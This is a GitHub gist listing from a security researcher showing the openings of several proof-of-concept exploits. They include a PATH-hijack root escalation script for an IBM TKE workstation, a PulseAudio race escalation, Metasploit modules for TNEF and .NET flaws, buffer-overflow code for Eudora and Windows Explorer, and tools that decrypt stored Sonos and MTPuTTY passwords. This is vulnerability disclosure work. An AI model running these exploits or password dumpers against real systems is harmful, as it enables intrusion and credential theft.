Skip to content

Instantly share code, notes, and snippets.

View ykoster's full-sized avatar

Yorick Koster ykoster

39 followers · 0 following
View GitHub Profile
@ykoster
ykoster / SonosController.ps1
Last active April 3, 2019 18:35
Sonos Controller for Windows ShareConfig.xml weak file permissions
# load System.Security for HMAC-SHA256
Add-Type -AssemblyName System.Security
$ip = "127.0.0.1"
$port = 3445
$configPath = "$env:ProgramData\Sonos,_Inc\runtime\ShareConfig.xml"
$sharePath = "$env:windir\media"
# the entropy value is hardcoded in the service and used for encrypting and decrypting the password of the Sonos user (DPAPI)
$entropy = [System.Text.Encoding]::Unicode.GetBytes("e51bd1fb-2783-4261-95b8-027afc69e8af");
@ykoster
ykoster / gotroot.sh
Created March 31, 2019 07:28
IBM Trusted Key Entry (TKE) workstation local privilege escalation
#!/bin/bash
OLDPATH=$PATH
trap cleanup EXIT
export PATH=.:$PATH
/bin/cat > $HOME/iptables << __EOF
#!/bin/bash
/bin/su -c /usr/bin/xterm
__EOF
@ykoster
ykoster / mordan.c
Created June 4, 2019 06:40
Mordan is a program that can be used to determine the internal state of the java.util.Random() random number generator
/* ---------------------------------------------------------------------
* mordan.c
* revision 0.4
* ---------------------------------------------------------------------
* November 2005, Yorick Koster, ITsec Security Services
* ---------------------------------------------------------------------
* Mordan is a program that can be used to determine the internal state
* of the java.util.Random() random number generator. In order to do so,
* mordan requires two integer values (created with Random.nextInt())
* or one long value (created with Random.nextLong()).
@ykoster
ykoster / Invoke-MTPuTTYConfigDump.psm1
Last active February 27, 2024 13:50
Invoke-MTPuTTYConfigDump - read an MTPuTTY configuration file, decrypt the passwords and dump the result
<#
.Synopsis
Decrypt an MTPuTTY configuration file
.Description
Read an MTPuTTY configuration file, decrypt the passwords and dump the result
.Parameter ConfigFile
Path to the MTPuTTY configuration file
@ykoster
ykoster / evolution_tnef_plugin_multil.rb
Created October 1, 2019 14:10
yTNEF/Evolution TNEF Attachment decoder plugin directory traversal & buffer overflow vulnerabilities - proof of concept (https://www.akitasecurity.nl/advisory/AK20090601/ytnef_evolution_tnef_plugin_traversal___overflow_vulnerabilities.html)
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::SMTPDeliver
def initialize(info = {})
super(update_info(info,
'Name' => 'Evolution TNEF Attachment decoder plugin directory traversal and buffer overflow vulnerabilities',
'Description' => %q{
@ykoster
ykoster / pa_race.sh
Created October 1, 2019 14:29
PulseAudio local race condition privilege escalation vulnerability - proof of concept (https://www.akitasecurity.nl/advisory/AK20090602/pulseaudio_local_race_privilege_escalation_vulnerability.html)
#!/bin/bash
pulseaudio=`which pulseaudio`
workdir="/tmp"
#workdir=$HOME
id=`which id`
shell=`which sh`
trap cleanup INT
@ykoster
ykoster / parse_srv.c.diff
Created October 7, 2019 12:31
MS04-037: Vulnerability in Windows Shell Could Allow Remote Code Execution - proof of concept
--- download/samba-3.0.2a/source/rpc_parse/parse_srv.c.O Fri May 21 21:18:14 2004
+++ download/samba-3.0.2a/source/rpc_parse/parse_srv.c Sat Jun 12 18:26:37 2004
@@ -28,6 +28,450 @@
#undef DBGC_CLASS
#define DBGC_CLASS DBGC_RPC_PARSE
+/*
+ * Exploit code for "Microsoft's Explorer and Internet Explorer long
+ * share name buffer overflow" discovered by Rodrigo Gutierrez.
+ * $rev 1.5, Yorick Koster, June 12, 2004
@ykoster
ykoster / EudoraBoF.c
Created October 7, 2019 12:33
Eudora 5.2.1 buffer overflow through overly long attachment filename - proof of concept
/*
* Summary : Eudora 5.2.1 has a remotely exploitable buffer overflow
* This vulnerability can be exploited by spoofing an attachment
* that has an overly long filename. An overly long filename will
* cause ECX to be overwritten, this value is later used in EIP,
* thus allowing the execution of arbitrary code.
* Note that the filename must begin with a backslash character
* in order to trigger the buffer overflow. Dot characters are
* not needed, but will trigger the buffer overflow sooner
*
@ykoster
ykoster / EMFexp.c
Created October 7, 2019 12:33
Enhanced Meta File arbitrary memory access vulnerability - proof of concept
/* -----------------------------------------------------------------------------
* Enhanced Meta File arbitrary memory access vulnerability
* Revision 0.1, Yorick Koster, November 5th, 2004
* -----------------------------------------------------------------------------
* Summary:
* ---------
* An memory access flaw has been discovered in the
* GetEnhMetaFilePaletteEntries() [1] function. This flaw can be used to crash
* programs that call this function. Furthermore, it is also possible to copy
* arbitrary parts of memory into a buffer that is passed to the
@ykoster
ykoster / ms12_025_dotnet_encoderparameter.rb
Created October 7, 2019 12:36
.NET Framework EncoderParameter integer overflow vulnerability - proof of concept
##
# run 'rundll32 dfshim CleanOnlineAppCache' to clear ClickOnce cache
##
require 'msf/core'
require 'base64'
require 'digest/sha1'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking